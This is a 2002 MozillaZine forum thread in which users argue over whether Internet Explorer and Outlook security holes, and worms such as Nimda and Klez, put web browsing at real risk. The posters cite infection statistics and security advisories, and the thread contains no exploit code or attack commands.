'Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site. This can be accomplished with the default installation of Internet Explorer 6.0, Outlook Express 6.0 and probably Outlook and Outlook 2002 and whatever other Outlook's there are. Default settings for Outlook Express and Outlook: restricted zone.'

#29 Not my experience

by jsebrech

Saturday July 6th, 2002 3:02 AM

Reply to this message

I'm quite lazy, and since I'm a linux user myself I don't always run windows update on time for the windows machines I administer for other people.

Net result: 2 infections in 2 years. Both through IE. And that doesn't include the 3 or so infections in my circle of family and friends on machines that I don't administer.

Car accidents in that time: 0

It may not sound like much, but the viruses exist. Just because YOU haven't been touched by them doesn't mean that nobody's getting the rough treatment.

Now, statistically someone's chance of getting in a car accident may actually be higher than that of getting a virus or worm or whatever on their computer, but that's only because the occurance of car accidents is so incredibly high. The equivalent of a small country dies on the road each year, so it's not exactly hard for something to be less of an effect than that.

#33 Re: Not my experience

by kristen

Saturday July 6th, 2002 6:10 AM

Reply to this message

"Now, statistically someone's chance of getting in a car accident may actually be higher than that of getting a virus or worm or whatever on their computer"

Exactly! ;)

#45 Re: Re: Not my experience

by asa <asa@mozilla.org>

Saturday July 6th, 2002 1:16 PM

Reply to this message

Not exactly. Actually, exactly wrong. Your highlighting of that comment only serves to point out your lack of knowledge in these areas.

In the full year of 2000 there were 6,393,140 crashes for 272,690,813 registered drivers. Thats a 1 in 42 chance of being involved in a wreck in 1 year or roughly 0.15% of registered drivers involved in a wreck for any given 3 week period. <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html>

Three weeks after discovery Klez, a worm which exposed user data to other users, ihad nfected 7% of PCs worldwide and that's just _one_ worm. Don't forget Melissa, Lovebug, Code Red, Nimda SirCam and Kournikova. <http://216.239.35.100/sea…ez&hl=en&ie=UTF-8> You can see their live daily stats here <http://wtc.trendmicro.com/wtc/summary.asp>

So in the first three weeks of the Klez epidemic you were about 46 times more likely to be a victim of Klez than be involved in a car wreck. I'd say that your chanced of getting a virus or worm on your Windows PC (if you're using Outlook) is considerably higher than being involved in a car wreck. If you've got data to suggest otherwise then please produce it.

According to Computer Economics, in 2001 "Nimda cost companies $635 million in clean-up and lost productivity. The total sum for the various versions of Code Red was $2.62 billion, SirCam leeched $1.15 billion out of corporate coffers, and the unlovely Love Bug cost $8.75 billion to exterminate." <http://www.wired.com/news…ture/0,1377,49681,00.html>

But that's all a bit off-topic except to point out that while getting in a car wreck can be more dangerous or expensive than getting an MS Outlook virus/worm, your chances of getting a virus/worm by using Microsoft Outlook (as it ships on most machines) are pretty good and the costs are non-trivial to individuals and downright expensive for businesses.

It's also worth noting that if you use any email client other than Microsoft's then your chances of running into any of this mess is dramatically (or completely) reduced. There are steps that savvy users of Microsoft's insecure email client can take to protect themselves but most users aren't savvy.

--Asa

#48 Re: Re: Re: Not my experience

by kristen

Saturday July 6th, 2002 7:18 PM

Reply to this message

"There are steps that savvy users of Microsoft's insecure email client can take to protect themselves but most users aren't savvy."

Just like an 'unsavvy' Mozilla user could run attachment called 'iloveyou.exe' that they received from someone they know that could cause all sorts of trouble.

I'll be even more clear to sums things up for those that are confused. I keep reading about the 'killer' features of Mozilla. Those being, tabbed browsing and pop-up killing and, of course, security.

Well, when I look at those individually I don't see anything marvelous here.

What is so innovative about opening multiple web documents within the same window? This has existed in a variety of products (both freeware and commercial) for a long time. Pop-Up killing? What is so innovative about that? There are a variety of products, again both freeware and commercial, that can do the same thing, and much more actually.

Finally, the security. Although everything has shifted now to email security (and that's ok with me) what has anyone said regarding browser security as I replied to arielb about? Email is dfferent, it is targeted. I can send an email to you but I can't force you to view a web page. No one at all has offered anything regarding a web page exploiting a reported 'IE hole' and comprising their security. Plenty of people bash IE for this but no one can substantiate it with real world data.

Ok, back to the email. People keep pointing out these top reported worms that require a user to execute an attachment. My point was, and still is, that the attachment could just have easily been an executable that read read a ns4, mozilla, etc address book (under windows, mac, linux, etc), include its own smtp engine, and appropriatley wreak havoc. No one has said a single thing that would inspire me to run off and use Mozilla Mail.

What's kinda funny is that you're talking about the security of a product that in some ways doesn't exist as far as end users are concerned. For testing purposes only. ;)

#53 Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Saturday July 6th, 2002 9:12 PM

Reply to this message

"Just like an 'unsavvy' Mozilla user could run attachment called 'iloveyou.exe' that they received from someone they know that could cause all sorts of trouble. "

Launching an executable is a far cry from opening an email. A client which allows a user to be exploited by the simple act of opening an email is a dangerous and insecure tool. As it has been stated here several times, no launching of anything, just reading a mail in Outlook is all that's requried. Given two clients, one where opening a mail doesn't allow an attacker to exploit you and one where opening a mail does allow an attacker to exploit you, I think it's reasonable to say one is more secure than the other. Feel free to disagree with that but it isn't very strong ground from which to argue.

--Asa

#54 Re: Re: Re: Re: Re: Not my experience

by kristen

Saturday July 6th, 2002 10:12 PM

Reply to this message

"Launching an executable is a far cry from opening an email."

That's certainly true. It's also a far cry from the 'viri' that are repeatedly cited in the OE bashing quest, namely, ILOVEYOU, Melissa, and W32.Klez. All of which require the user to execute an attachment.

"A client which allows a user to be exploited by the simple act of opening an email is a dangerous and insecure tool."

Sure does sound like it. My question is: Where is it? After reading about HELP.Dropper and all of its 'if, maybes, and possiblies' who has been affected by this and where? Why hasn't this so-called dangerous beast of a thing made the charts like 'user must execute attachment' ones? All a google search turns up of 'HELP.Dropper' is a series of links quoting the same original article. Surely, a delivery mechanism that only requires a user to open an email (with scripting, activex, etc. completely disabled) would be topping the charts left and right!!

Is this the best that can be had here? I'm sure that several here, like tuxracer, are digging around like crazy to find something, anything, to justify the incessant IE/OE security bashing that takes place within the mozilla community as a sales pitch as to why I (or anyone else) should switch.

Not only can no one provide any real-world information regarding websites exploiting IE security holes to compromise a users system, the best that can be had so far is some obscure 'exploit' that sounds like the most dangerous and effective thing in the world yet is reported nowhere, other than the same initial 'report' being quoted several times over.

Some people really need to pull their heads out of the sand boxes. This whole IE/OE security thing is not as cut and dry as many here would like others to believe. Although I was never expecting to receive any nominations for a 'Mozillian of the Year' award, it has all been rather interesting, educational, and albeit, not surprising. ;)

#55 Re: Re: Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Sunday July 7th, 2002 12:35 AM

Reply to this message

I guess we agree to disagree then. You're not going to convince me that Outlook or IE are doing more to protect my data and the integrity of my system than Mozilla and I'm not going to convince you that the treat is significant enough to warrant precaution.

--Asa

#56 Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 12:55 AM

Reply to this message

"I guess we agree to disagree then"

Agreed.

The only thing is -> That I'm not evangelizing anything. ;)

#61 Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Sunday July 7th, 2002 9:45 AM

Reply to this message

"The only thing is -> That I'm not evangelizing anything. ;)"

Yes, you are ;) To deny that is silly. You're evangelizing s position that there are no real threats to computer users and therefore no one needs to take further precautions to secure their data. You're clearly evangelizing and to claim otherwise is disingenuous. You've said basically that Joe Blow's chances of getting in a car wreck is very slim so why use a seatbelt and why discourage drunk driving. I'm evangelizing the position that any threat, however slim the chances of materialization, is worth defending against when the consequences are this extreme. There are a number of defenses against being attacked and one of the most practical is to use software which is both more secure and which is being targeted less. I'm evangelizing the position that being killed or maimed in a car wreck is sufficiently horrible that even though Joe Blow's chances of being the victim of such bad fortune are slim that he should wear a seatbelt and avoid drinking and driving.

--Asa

#74 Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 5:20 PM

Reply to this message

"Yes, you are ;) To deny that is silly. You're evangelizing s position that there are no real threats to computer users and therefore no one needs to take further precautions to secure their data."

I guess I'm silly then. ;) I told a single person who was distressed with downloading security updates for IE that if he/she was that bothered by it that he/she should take comfort in the fact that they are more likely to get killed in a car wreck (several times over) than to come across a web site that compromises their security.

No one has said a single thing to refute this. I'll give you a hint as to why -> Because you can't. ;)

#76 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Sunday July 7th, 2002 8:06 PM

Reply to this message

You did considerably more than tell a single distressed person. You posted nearly a dozen comments all suggesting that people were overly concerned about security.

I can't point you to a single site that compromises your security. That's not the point. The point is that there is a better chance of being a victim if you're using insecure software like Outlook or IE.

If security isn't really a problem, like you suggest, then to what do you attribute the estimated $1.6 trillion that security attacks, virus and worm attacks, and associated downtime cost in 2001 <http://216.239.35.100/sea…us&hl=en&ie=UTF-8> . $2.6 billion for cleanup of RedWorm alone doesn't seem like a non-issue to me <http://216.239.35.100/sea…us&hl=en&ie=UTF-8> . If security isn't a problem then why are corporations predicted to up their computer security budgets from 0.4% of revenue to 4% of revenue in less than a decade <http://216.239.35.100/sea…us&hl=en&ie=UTF-8> ? Individuals and companies spending $4.8 billion a year on security software because their application and OS software is full of holes doesn't seem like a non-problem to me <http://techupdate.zdnet.c…n/0,14179,2845627,00.html> . You can find more good reading on the costs and difficulties of setting up and maintaining a secure computing environment at <http://edtn.bitpipe.com/data/rlist?t=soft_10_136_2> .

"should take comfort in the fact that they are more likely to get killed in a car wreck (several times over) than to come across a web site that compromises their security."

Even if you've got statistics to back that up (did you post something and I missed it?) that's just not the point. I can't point you to a location where you are guaranteed to be involved in a car wreck but that shouldn't stop you from taking precautions like wearing a seat belt and not driving a vehicle drunk (or one which has a good chance of rolling over if you take evasive action).

Computers are attacked. Data is stolen or otherwise compromised. Computing is disrupted, bandwidth is lost and systems are destabilize by virus, worm and DOS attacks. To deny these facts is as silly as to deny that tens of thousands of people are killed each year in automobile accidents. Taking steps to avoid being a victim sounds like reasonable behavior to me.

--Asa

#81 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by kristen

Sunday July 7th, 2002 9:31 PM

Reply to this message

"You did considerably more than tell a single distressed person."

Yes, I've had to explain to several others as to why I said that.

"I can't point you to a single site that compromises your security. That's not the point."

That is the point. And thanks for help making it. ;)

"Computers are attacked. Data is stolen or otherwise compromised. Computing is disrupted, bandwidth is lost and systems are destabilize by virus, worm and DOS attacks."

No argument there. ;)

#83 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Sunday July 7th, 2002 10:03 PM

Reply to this message

"That is the point. And thanks for help making it. ;) "

That a site could appear any day, or already exists and is exploiting users without my personal and specific knowledge supports your position that there are no threats to user systems and user data on the web?

"No argument there. ;)"

So you agree that there are risks to data security and system integrity on the web and in email?

(If we keep this going for another round or two the post title will be nothing but Re:Re:Re:Re...)

--Asa

#90 Re: No

by kristen

Monday July 8th, 2002 5:44 PM

Reply to this message

"That a site could appear any day, or already exists and is exploiting users without my personal and specific knowledge supports your position that there are no threats to user systems and user data on the web?"

Of course not. That never was my position. My position was that arielb is more likely to get killed in a car wreck several times over than to visit a web page that compromises his or hers security.

"So you agree that there are risks to data security and system integrity on the web and in email?"

Yes, of course. The thing is I still don't see anything significant regarding web browsing.

"(If we keep this going for another round or two the post title will be nothing but Re:Re:Re:Re...)"

Ok. ;) I trimmed. Sorry about that.

#105 Re: tuxracer's comparison

by tuxracer

Tuesday July 9th, 2002 10:00 AM

Reply to this message

"My position was that arielb is more likely to get killed in a car wreck several times over than to visit a web page that compromises his or hers security."

Wrong: <http://www.mozillazine.or…le=2329&message=45#45>

#87 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by SubtleRebel <mark@ky.net>

Monday July 8th, 2002 8:35 AM

Reply to this message

> "I can't point you to a single site that compromises your security. That's not the point." > > That is the point. And thanks for help making it. ;)

If it is a point, then it is a moot point. The fact is that whenever a website that would compromise someone's security is discovered, it is shut down. If everyone ignored malicious websites and allowed them to stay active on the net then the cost of the damage would be astronomical (as if it were not high enough already). You are indeed very silly (perhaps another word would be better) if you honestly believe that the fact that we have not produced a list of sites that compromise your security somehow validates your lackadaisical attitude regarding Internet security.

In the past year I have shut down or forced the cleanup of over 100 websites infected with Nimda; if I were to discover a website that used the Help.Dropper method or the buffer overrun method of compromising someone's security, getting it shut down or cleaned up would be a top priority for me; coming to this forum and posting the URL would be the very last thing that I would do -- actually I would probably never post the URL here.

#92 Re: No

by kristen

Monday July 8th, 2002 8:11 PM

Reply to this message

"You are indeed very silly (perhaps another word would be better) if you honestly believe that the fact that we have not produced a list of sites that compromise your security"

I guess I'm silly. ;) What has not been produced are cases of widespread security issues involving web browsing. The pillar that everyone here is falling on falls back to email in one for or another. I admit, I am partially to blame for that since I let the topic deviate from my initial comment to arielb and fueled it even more.

Besides personal experience which I know doesn't amount to much in the grand scheme of things, I have searched and searched and searched for cases of where as a result of web browsing has caused anything close to a security hazard. All I read (icluding the links people have posted here) are things whos main propogation was via email.

As a result, this doesn't convince me in the least to admit error, or retract my statement to arielb, that he or she is more likely to get killed in a car wreck several times over than to come across a web page that compromises his or her security.

Back to email. So, I should use Mozilla Mail then if I don't use av software and I run an unpatched version of OE? The rationale being that because it happened before it will happen again? Was I not supposed to use Netscape 3.0 because Netscape 2.0 submitted my real email address to ftp sites I visited? Was I not supposed to use a newer version of netscape4 because an older version of netscape4 had a security hole (of which there have been many in the communicator line)? Whould whoever not use sendmail because older versions allowed one to breach a security hole within sendmail to fake their IP address? What about Apache? What about, etc. etc.??? What about all sorts of software that have had security issues? Are you suggesting that security is a Microsoft only thing? Or an OE only thing?

From where I am sitting it seems that all sorts of networking software (created by humans) has had issues in one form or the other, we just hear about the ones that effect the most popular and widely used packages is all.

#93 Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 9:38 PM

Reply to this message

If you'll re-read my last post above you'll see that NIMDA was both an email and browser exploit (the email exploit was actually a browser security issue and delivered its payload via a secuiry hole in IE which displays html email for outlook). The exploit came in the form of emails _and_ webpages. If you got NIMDA then there's a decent chance you got it from an infected webpage.

--Asa

#95 Re: Re: Re: No

by kristen

Monday July 8th, 2002 9:56 PM

Reply to this message

"If you'll re-read my last post above you'll see that NIMDA was both an email and browser exploit"

I did read about NIMDA. I've read several articles about NIMDA and its overwhelming propogation came from that of email, not web browsing.

#98 Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 10:16 PM

Reply to this message

With millions of infections, even a small percentage by webpage can add up to a lot. I couldn't find any numbers on the percentage that were emailed and that were webpages (got a URL for me?) but the point still stands that it did spread via webpages enough for that to be included in every security bullitin I could find on NIMDA and even where it was spread by email it was the same mechanism (a hole in IE) as was used in the exploit.

--Asa

#103 Re: Re: Re: Re: No

by SubtleRebel <mark@ky.net>

Tuesday July 9th, 2002 3:56 AM

Reply to this message

> "If you'll re-read my last post above you'll see > that NIMDA was both an email and browser exploit" > > I did read about NIMDA. I've read several articles > about NIMDA and its overwhelming propogation came > from that of email, not web browsing.

What exactly are you basing that claim on? I am not aware of any factual study conducted to trace the propogation of NIMDA; I would think that that would be a nearly impossible task without pervasive access to thousands of companies' servers and workstations.

As I mentioned in a previous post, I have personally have dealt with over 100 NIMDA infected websites. What I did not mention was that the reason that I have dealt with so many is because I have worked with 3 different companies whose networks were brought to their knees by NIMDA and we had to spend a lot of time getting them clean. During the process we tracked NIMDA back to websites and email. One of the companies called me in after they had been infected for the second time; the first time they cleaned all their sysems and upgraded their mail server's antivirus software so that it would stop NIMDA infected email; they could not understand how they got infected the second time because they had ignored the fact that NIMDA could spread through web browsing and file sharing. In almost every case, the individual users at these companies had no clue whether they were infected by mail, web, or file share; if asked they would probably say email because they believe, like you apparently do, that worms only get spread by email.

#94 Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 9:41 PM

Reply to this message

From where you're sitting all sorts of software has problems so using the software with the most problems and the most people attacking it is better than using sofware with the fewest problems and the fewest people attacking it?

--Asa

#96 Re: Re: Re: No

by kristen

Monday July 8th, 2002 10:01 PM

Reply to this message

"From where you're sitting all sorts of software has problems so using the software with the most problems and the most people attacking it is better than using sofware with the fewest problems and the fewest people attacking it?"

Let me get this straight then. We should all use what isn't used much in order to best protect ourselves? I'm detecting a catch-22 in this. ;)

How about some sensible user education, use of av software, and maybe even firewalls instead? Maybe even better server side protection? I don't believe there is a product in the world that can replace all of that.

#99 Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Monday July 8th, 2002 10:29 PM

Reply to this message

"Let me get this straight then. We should all use what isn't used much in order to best protect ourselves? I'm detecting a catch-22 in this. ;) "

Given a choice between a lesser used product with fewer holes and a more well known product with a lots of holes I'll take the lesser know one and recommend others do the same, especially when the feature sets are comparable. If the balance ever shifts and as user base grows it becomes more of a danger then an alternative with comparable features then maybe I'll move to some other app and recommend others do the same. I don't think that's the whole of it though. That it isn't used as much isn't the only reason that it isn't as succeptible to attack. It's fundamentally more secure. It was designed with security in the foundation, not tacked on as an afterthought (my opinion). I believe that given equal marketshare and equal contempt from crackers and other doers of malice that Mozilla would still be less succeptible to attack than IE.

"How about some sensible user education, use of av software, and maybe even firewalls instead? Maybe even better server side protection? I don't believe there is a product in the world that can replace all of that. "

Probably a good idea. Is my mom going to get much more of an education, purchase and install and then keep up to date an AV app to protect her free web browser, purchase, install and configure a firewall (or pay others to), demand better server-side protection from her ISP? I doubt it. Maybe she'll install some AV software. She'd do well to do everything you suggest because she does have mounds of proprietary and valuable data on her PCs (she runs a small publishing house). Doing all of those things would be good. Doing even some of those things would be good because if you have valuable data on your systems or you can't afford disk-full downtime or lost bandwidth or DOS attacks, then everything you can do to protect yourself is good. Everything including replacing insecure client apps like IE and Outlook.

--Asa (have we hit 100 comments yet?) :)

#100 100th Comment

by AlexBishop <alex@mozillazine.org>

Monday July 8th, 2002 10:44 PM

Reply to this message

> (have we hit 100 comments yet?) :)

We have now.

Alex

#101 Re: 100th Comment

by kristen

Monday July 8th, 2002 11:17 PM

Reply to this message

"We have now."

Sheesh, you beat me to the punch! ;)

#102 Re: Re: Re: Re: Re: No

by kristen

Tuesday July 9th, 2002 12:11 AM

Reply to this message

"Everything including replacing insecure client apps like IE and Outlook."

The key operative here being 'and'. ;)

Can you tell me if I were to browse the web with IE yet use, lets say Pegasus, as my email client what the odds/risk would be to me that I came across a web site that compromised my security? 1 in 10? 1 in 1,000? 1 in 1,000,000? Or perhaps somewhere along the lines of being killed in a car wreck several times over?

Ok, I think this makes 102. ;)

#106 Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Tuesday July 9th, 2002 10:20 AM

Reply to this message

IE and Outlook are both considerably more succeptible to virus, worm and exploit attacks than any alternatives. I think I've demonstrated that with strong data in the links I've posted in this thread. Get rid of Outlook and you get rid of some of the danger. Get rid of IE and you get rid of even more (I repeat, especially since many of the exploits in these other MS apps are actually a hole in IE). If you read the accounts posted here <http://www.mozillazine.or…=2329&message=103#103> you'll see that IE played a role in the spread of NIMDA. I'll try again to find some statistics but so far my searching has turned up little. What I can't find is a single warning about NIMDA from credible sources that doesn't mention the danger of being infected by webpages if you're using vulnerable versions of IE. I've consistently tried to provide statistics where available and other data <http://www.mozillazine.or…le=2329&message=45#45> from reliable sources and you continue to manufacture statistics and repeat (or at least imply via questions) these non-facts about how likely a user is to be impacted by the lack of security in his email and browser clients. When you show me some numbers that actually demonstrate that a user is more likely to get killed in a car wreck than to be exploited while web browsing then I'll return to that debate but repeating it over and over doesn't make it reality and the data I've provided at <http://www.mozillazine.or…le=2329&message=45#45> suggests that your guess is far from accurate.

--Asa

#107 Getting rid of IE

by AlexBishop <alex@mozillazine.org>

Tuesday July 9th, 2002 11:41 AM

Reply to this message

"Get rid of IE and you get rid of even more (I repeat, especially since many of the exploits in these other MS apps are actually a hole in IE)."

Of course, because Microsoft considers IE to be an essential operating system component, getting rid of it is not an easy task.

Alex

#108 Re: Re: Re: Re: Re: Re: Re: No

by kristen

Tuesday July 9th, 2002 6:58 PM

Reply to this message

"I think I've demonstrated that with strong data in the links I've posted in this thread."

Actually, you haven't. All you, and others, have done are site examples that involved email in one form or another. Everything that has been cited is first described by SARC as 'mass mailing worms' who have payloads of 'large scale emailing'.

It doesn't take a genius or Phd. to figure this out. We all know the devastation of email worms such as Melissa and ILOVEYOU even though they required the user to execute an attachment. Now imagine the consequences of something that only requires a person to view the email.

The point is, Asa, that you have made no case in refuting my initial statement to arielb. All that is left now is to nit pick over whether a person is more likely to killed in a car wreck once, twice, five times, ten times, etc.

Ok, 108 I think. ;)

#109 Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Tuesday July 9th, 2002 8:33 PM

Reply to this message

"All you, and others, have done are site examples that involved email in one form or another."

Wrong. I cited NIMDA, <http://www.mozillazine.or…le=2329&message=84#84> repeatedly, and estimated financial impact as well as estimated numbers of infections. This was a worm that affected Outlook and IE and didn't require user execution. _It_ _is_ _a_ _worm_ _that_ _affected_ _IE_ _via_ _webpages_ _and_ _doesn't_ _require_ _user_ _execution_.

" Now imagine the consequences of something that only requires a person to view the email."

I don't have to imagine and neither do you. Look it up. Read my post at <http://www.mozillazine.or…le=2329&message=84#84> "NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day (LINK)"

"The point is, Asa, that you have made no case in refuting my initial statement to arielb."

If arielb wants to avoid getting and spreading NIMDA from visiting an infected webpage then applying MS security updates is the next best thing to not using IE. I don't see where that falls short of a refutation.

--Asa

#110 Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by kristen

Tuesday July 9th, 2002 8:55 PM

Reply to this message

"Wrong. I cited NIMDA"

That's right, you did site NIMDA. And just like I said you have sited nothing that didn't involve email in one form or another:

<//securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html>" rel="nofollow"><http://securityresponse.s…</data/w32.nimda.a@mm.html>>

What it boils down to is that you are just somehow hoping to convince me that NIMDA proliferated heavily due to web surfing rather than email. So far, you've done a very poor job. ;)

#111 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Tuesday July 9th, 2002 11:29 PM

Reply to this message

I'm not trying to convince you that it proliferated heavily due to web surfing. I'm trying to convince you that it's spread due to web surfing was non-trivial and treating it as if it was trivial is reckless.

NIMDA proliferated heavily. There are first person accounts in this forum that recall NIMDA spreading via web pages. You're free to discount the security experts and the first person accounts from mozillaZine forum participants but it doesn't seem to be a reasonable position to me.

Cisco says: "Minimizing Damage and Limiting Fallout...# Use netscape as your browser, or disable Javascript on IE, or get IE patched to SP II." <http://www.cisco.com/warp/public/63/nimda.shtml>

CERT says: "This modification of web content allows further propagation of the worm to new clients through a web browser or through the browsing of a network file system." <http://www.cert.org/advisories/CA-2001-26.html>

news.com: " The ability to infect others through viewing a Web page is the Nimda worm's second path of infection. The snippet of JavaScript added to each Web file on an infected server will cause the worm, renamed "readme.eml," to upload from the server to the surfer's computer. The worm will run automatically on PCs using unpatched versions of Microsoft's Internet Explorer 5.5 SP1 or earlier. On any browser with JavaScript enabled, the worm's script will cause the browser to try to upload the code but will first ask the PC user's permission. PCs can also be infected through the worm's third mode of transmission: e-mail. " (that sounds an awful lot like they put the browser spreading higher in importance than the email spreading) <http://news.com.com/2100-…1-273353.html?legacy=cnet>

ISG says: "Not only does 'Nimda' spread by e-mail and through network shares, it compromises servers in a similar manner to 'Code Red', and can infect users via their web browser - a method not seen with any previous virus. Traditional mail based virus protection is not adequate in protecting your organisation's systems from this virus/ worm." <http://216.239.35.100/sea…er&hl=en&ie=UTF-8>

PCWorld: "Nimda was originally fought using a combination of e-mail and Web filters, antivirus updates, and updates to Microsoft's Internet Explorer Web browser, which is the browser exploited to automatically download the worm." <http://www.pcworld.com/ne…rticle/0,aid,68966,00.asp>

wired: "This worm, named W32/Nimda.A-mm, is dangerously different than virtually all other e-mail and network-borne viruses: It can infect a computer when a user simply clicks on the subject line of an e-mail in an attempt to open it, or visits a Web page housed on an infected server. And many of the infected machines now contain a gaping security hole, created by the worm, that will allow a malicious hacker complete access to the contents of an infected machine or network....Code Red was deemed by the FBI to be so dangerous that it could bring down the entire Internet due to the increased traffic from the scans." <http://www.wired.com/news…logy/0,1282,46944,00.html>

If that's not enough to convinve you that this worm infects MS servers and visiting web pages on those servers with a MS browser is dangerous and that there was a real impact due to it's spread via web browsers, then I guess we're back to agreeing to disagree.

Do you have experts to refute my experts in their claim that NIMDA spread via web browsers?

--Asa

#112 One addendum

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 12:24 AM

Reply to this message

>If that's not enough to convinve you that this worm infects MS servers >and visiting web pages on those servers with a MS browser is dangerous >and that there was a real impact due to it's spread via web browsers,...

Although MS servers are more susceptible, it is possible for websites on Linux servers to become infected as well via SAMBA file shares between the server and an infected Windows machine; it may also be possible via NFS, but I personally have only seen it happen via SAMBA.

#115 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by kristen

Wednesday July 10th, 2002 1:21 AM

Reply to this message

"If that's not enough to convinve you that this worm infects MS servers"

I have never disputed that. I'll break it down for you in more simple terms, though.

Let's forget for a moment the exponential growth rate of the email form of NIMDA and focus solely on web surfers who browsed during that period of time with IE. How many are you suggesting became infected with NIMDA via browsing with IE? 25%/50%/100% of all those infected? Whatever number you come up with it is miniscule compared to the number of IE surfers during the same period of time.

The problem is that you want me to believe that it is a very high number. So high, in fact, that it discounts what I said to arielb. The problem is though that you have nothing to convince me otherwise. You can cite 'experts' saying that NIMDA is dangerous, has infected web servers, etc. I don't disagree with that in the least. What I do know is this (and no CNET 'experts' are required to come to this conclusion). I do know that Melissa and ILOVEYOU were extremely contagious due to them sending themselves out to peoples address books to gain trust so a recipient would be more likely to execute an attachment. I know that NIMDA is even worse in this regard in that a user doesn't have to manually execute anything. Via some simple common sense I can deduce (again without a CNET 'expert') that if Melissa and ILOVEYOU were so successful then NIMDA would be even more so. I don't need an 'expert' to tell me how and why NIMDA spread so fast. Have you ever wondered how NIMDA would have fared if it didn't infiltrate email? (That was rhetorical) ;)

"then I guess we're back to agreeing to disagree."

That's for sure. ;)

#123 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Wednesday July 10th, 2002 11:47 AM

Reply to this message

If webpage infections were even as low as 1% of the total infections (based on the phrasing of the warnings I suspect it was considerably more than this) and we saw as many as 86,000 infections in a single day <http://216.239.35.100/sea…da&hl=en&ie=UTF-8> then given a few weeks of the worm spreading at that rate there could be 20,000 infections via webpage in less than a month. In that same period there'd only be about 3,000 auto deaths in that same period.

You said to arielb about the pain of updating for ms security patches: "Then don't. What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck. "

Disregard the fact that every PC infection of NIMDA via email or webpage was indeed and specifically "because of an IE security hole" (which pretty much destroys your original claim) and just focus on the ones that were via web browser. In order to meet your estimate of being several times less likely than being killed in a car wreck, the percentage of infections via webpage would have to be about 5/100 of 1% of the total infections in that 3 week period. I don't buy that. If it was that little then it wouldn't be featured so prominently in all of the security alerts from CERT and others.

And then there's the point I made above, in direct refutation of your comment to arielb, that _every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_. That means that in the height of NIMDA (the one day of 86,000 infections) the probability of your computer being compromised because of an IE security hole was approximately 688 times more likely that being killed in a car wreck. You missed it by several orders of magnitude in the wrong direction.

--Asa

#124 Re: No

by kristen

Wednesday July 10th, 2002 12:57 PM

Reply to this message

"You missed it by several orders of magnitude in the wrong direction."

I don't think so. Here is some more simple math.

Calculate, during the whole 1.2 million NIMDA accumulation period, the total number of web pages served to IE clients. Now get that number and divide it into to the total number of infected web pages served IE clients for the same period. How about for the past 6 months? The past 2 years? 4 years?

What is the number you arrive at? Again, that was rhetorcial, as I can tell you that it is an extremely small number. You don't have to carouse around the Wild Wild Web to find an article at CNET to know this.

The only thing you have demonstrated to me is that their hasn't been any significant type of worm/virus that was spread due to strictly web browsing. The ones you do site, such as NIMDA and W32.Klez, are also proliferated via email, and they do so in a manner via email even more effective than Melissa and ILOVEYOU. Do you understand this?

Despite all of that, and despite even SARC's primary labeling of NIMDA and W32.Klez as 'mass mailing worms' with payloads of 'large scale emailing' you expect me to think that the infections via web pages were significant relative to the infections via email even when you yourself admit you have no breakdown of the numbers. Yet I am, somehow, supposed to relinquish simple common sense, reasoning, and perceptional abilities and say to myself:

'Yep, a guy by the name of Subtle Rebel over at Mozillazine has determined that the infection via web page rate was 24% because that's his experience, and, of course, the folks at Mozillazine are in favor of this figure, too. Throw in a nice juicy 'expert' article from News.com and hey, I don't need a brain to think any more.'

Sorry, but I don't think that dog is going to hunt. ;)

#126 Re: Re: No

by asa <asa@mozilla.org>

Wednesday July 10th, 2002 7:06 PM

Reply to this message

(until this thread get's bumped into the "older news" sidebar)

"The only thing you have demonstrated to me is that their hasn't been any significant type of worm/virus that was spread due to strictly web browsing. "

I see, because it spreads via email _and_ the web that means I haven't satisfied your criteria for a threat to web browsers. Nice logic.

--Asa

#127 Re: Re: Re: No

by kristen

Wednesday July 10th, 2002 7:37 PM

Reply to this message

"I see, because it spreads via email _and_ the web that means I haven't satisfied your criteria for a threat to web browsers."

No, not at all. A worm/virus threat to a web surfer is not the same thing as the probability of a web surfer contracting a worm/virus via visiting a web page.

The 'nice logic' comes in with the rest of my prior post in its entirety. ;)

#128 Re: Re: No

by SubtleRebel <mark@ky.net>

Thursday July 11th, 2002 9:00 AM

Reply to this message

"Yep, a guy by the name of Subtle Rebel over at Mozillazine has determined that the infection via web page rate was 24% because that's his experience, and, of course, the folks at Mozillazine are in favor of this figure, too."

You are misrepresenting what I said.

I explained how I determined that AT LEAST 24% of the NIMDA infections that I have dealt with were DEFINITELY NOT spread by email. I also stated that I could NOT determine the rate of infection via web page viewing because part of that 24% probably were not from web viewing and part of the other 76% probably were from web viewing; all that I can say for sure is that the 24% were not from email.

Ignoring facts presented is bad enough, but misrepresenting them is worse.

